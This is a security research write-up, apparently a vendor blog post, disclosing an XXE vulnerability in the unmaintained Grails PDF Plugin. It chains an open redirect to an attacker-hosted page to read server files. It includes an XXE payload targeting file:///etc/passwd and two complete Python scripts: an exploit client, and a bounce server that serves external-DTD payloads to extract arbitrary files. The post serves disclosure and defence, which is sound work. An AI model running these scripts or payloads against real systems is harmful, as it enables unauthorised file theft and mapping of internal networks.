Some times ago the Ambionics team encountered a very old instance of Grails, a Groovy based MVC framework. This instance contained a plugin to generate PDFs from Groovy templates, and was quite simply named PDF Plugin. Upon looking for the plugin's source code, it appeared that it had not been maintained in the past 6 years, with a very last commit dating from August 3, 2011. Evidently, this caught our eye.
Extract from the plugin's README:
Pdf plugin allows a Grails application to generate PDFs and send them to the browser by converting existing pages in your application to PDF on the fly. The underlying system uses the xhtmlrenderer component from java.net along with iText to do the rendering.
Two important things can be noted:
Upon further inspection, it also appeared that Flying Saucer, the Java library which converts HTML to PDF, has the following properties:
As always, when we see XML parsers, we think about its XXE capability. What if we could read files on the server?
Here is the code of the main controller of the plugin, with comments of my own:
// The eponym method is called upon reaching the /pdf/pdfForm URL, and the // params array is user-submitted GET/POST data def pdfForm = { try{ byte[] b // Build a base URI, something like // http://localhost:80/base_path/ def baseUri = request.scheme + "://" + request.serverName + ":" + request.serverPort + grailsAttributes.getApplicationUri(request) // 1: If it is a GET call, append the url parameter to the base URI, fetch it via an HTTP request, and render it // For instance, if we fetch http://target.com/pdf/pdfForm?url=/test.html, it will try to render http://localhost/test.html if(request.method == "GET") { def url = baseUri + params.url + '?' + request.getQueryString() //println "BaseUri is $baseUri" //println "Fetching url $url" b = pdfService.buildPdf(url) } // 2: If it's a POST call, generate the HTML content from a controller and an action, and feed it to the generator if(request.method == "POST"){ def content if(params.template){ //println "Template: $params.template" content = g.render(template:params.template, model:[pdf:params]) } else{ content = g.include(controller:params.pdfController, action:params.pdfAction, id:params.id, pdf:params) } b = pdfService.buildPdfFromString(content.readAsString(), baseUri) } response.setContentType("application/pdf") response.setHeader("Content-disposition", "attachment; filename=" + (params.filename ?: "document.pdf")) response.setContentLength(b.length) response.getOutputStream().write(b) } // In case of error, redirect to the url specified by the url parameter catch (e) { println "there was a problem with PDF generation ${e}" if(params.template) render(template:params.template) if(params.url) redirect(uri:params.url + '?' + request.getQueryString()) else redirect(controller:params.pdfController, action:params.pdfAction, params:params) } }
From the code, it appears that the PDF plugin has two ways of generating a PDF:
As we do not control any Groovy template or controller on the server, we're not interested in the second option. The first one looks more promising: it issues an HTTP request to a local URI.
Although it might be useful sometimes (for instance to bypass an IP filter or hitting an HTTP service in the internal network), making the module fetch a local URI for us, and return it as a PDF, is not of great help. What we want is complete control of the HTML page that was fed to the PDF renderer.
Luckily, the solution is in the same piece of code: the catch() call handles error by redirecting us to the URL of our choice (params.url), in case any exception happens during the PDF generation. Therefore, we have an open redirect: http://target.com/pdf/pdfForm?url=http://attacker.com/page.html
will redirect us to http://attacker.com/page.html
, because the code will try to send an HTTP query to http://target.com/http://attacker.com/page.html
, which will fail, throwing an exception.
Therefore, by issuing a GET request to: http://target.com/pdf/pdfForm?url=pdf/pdfForm?url=http://attacker.com/page.html
(note the duplication of the pdf/pdfForm?url= part)
This happens:
Let us try it by rendering an Hello world:
GET /page.html?url=/pdf/pdfForm?url=http://10.0.0.138/page.html?url=http://10.0.0.138/page.html?url=/pdf/pdfForm?url=http://10.0.0.138/page.html
We're now able to make the server render a page of our choice ! The first idea from this point was to use a file:// protocol instead of the standard http://; it did not work. It does not matter though, because this achievement widens our attack surface by a lot.
Now that we control our page, let's go ahead and verify Flying Saucer's promises.
For instance, let's ask it to render an image, with an <img src="image.jpg" />
tag:
Or some CSS:
It's now time to try a simple XXE:
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html [ <!ENTITY goodies SYSTEM "file:///etc/passwd"> ]> <html> <body> <!-- Since it's HTML after all, why not render our output nicely --> <pre>&goodies;</pre> </body> </html>
Which yields:
Listing directories is also possible, via the same vector:
Using the CSS parsing capability of Flying Saucer and pdftotext we are able to completely automate the process.
The exploitation allowed us to fetch critical data from the server, and helped us map internal network.
Even if the plugin is not that recent, here are recommandations about how to fix it, without code-diving too much:
dump_file.py
#!/usr/bin/python3 # Grails PDF Plugin XXE # cf # https://www.ambionics.io/blog/grails-pdf-plugin-xxe import requests import sys import os # Base URL of the Grails target URL = 'http://10.0.0.179:8080/grailstest' # "Bounce" HTTP Server BOUNCE = 'http://10.0.0.138:7777/' session = requests.Session() pdfForm = '/pdf/pdfForm?url=' renderPage = 'render.html' if len(sys.argv) < 0: print('usage: ./%s <resource>' % sys.argv[0]) print('e.g.: ./%s file:///etc/passwd' % sys.argv[0]) exit(0) resource = sys.argv[1] # Build the full URL full_url = URL + pdfForm + pdfForm + BOUNCE + renderPage full_url += '&resource=' + sys.argv[1] r = requests.get(full_url, allow_redirects=False) #print(full_url) if r.status_code != 200: print('Error: %s' % r) else: with open('/tmp/file.pdf', 'wb') as handle: handle.write(r.content) os.system('pdftotext /tmp/file.pdf') with open('/tmp/file.txt', 'r') as handle: print(handle.read(), end='')
server.py
#!/usr/bin/python3 # Grails PDF Plugin XXE # cf # https://www.ambionics.io/blog/grails-pdf-plugin-xxe # # Server part of the exploitation # # Start it in an empty folder: # $ mkdir /tmp/empty # $ mv server.py /tmp/empty # $ /tmp/empty/server.py import http.server import socketserver import sys BOUNCE_IP = '10.0.0.138' BOUNCE_PORT = int(sys.argv[1]) if len(sys.argv) > 1 else 80 # Template for the HTML page template = """<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html [ <!ENTITY % start "<![CDATA["> <!ENTITY % goodies SYSTEM "[RESOURCE]"> <!ENTITY % end "]]>"> <!ENTITY % dtd SYSTEM "http://[BOUNCE]/out.dtd"> %dtd; ]> <html> <head> <style> body { font-size: 1px; width: 1000000000px;} </style> </head> <body> <pre>&all;</pre> </body> </html>""" # The external DTD trick allows us to get more files; they would've been invalid # otherwise # See: https://www.vsecurity.com/download/papers/XMLDTDEntityAttacks.pdf dtd = """<?xml version="1.0" encoding="UTF-8"?> <!ENTITY all "%start;%goodies;%end;"> """ # Really hacky. When the render.html page is requested, we extract the # 'resource=XXX' part of the URL and create an HTML file which XXEs it. class GetHandler(http.server.SimpleHTTPRequestHandler): def do_GET(self): if 'render.html' in self.path: resource = self.path.split('resource=')[1] print('Resource: %s' % resource) page = template page = page.replace('[RESOURCE]', resource) page = page.replace('[BOUNCE]', '%s:%d' % (BOUNCE_IP, BOUNCE_PORT)) with open('render.html', 'w') as handle: handle.write(page) return super().do_GET() Handler = GetHandler httpd = socketserver.TCPServer(("", BOUNCE_PORT), Handler) with open('out.dtd', 'w') as handle: handle.write(dtd) print("Started HTTP server on port %d, press Ctrl-C to exit..." % BOUNCE_PORT) try: httpd.serve_forever() except KeyboardInterrupt: print("Keyboard interrupt received, exiting.") httpd.server_close()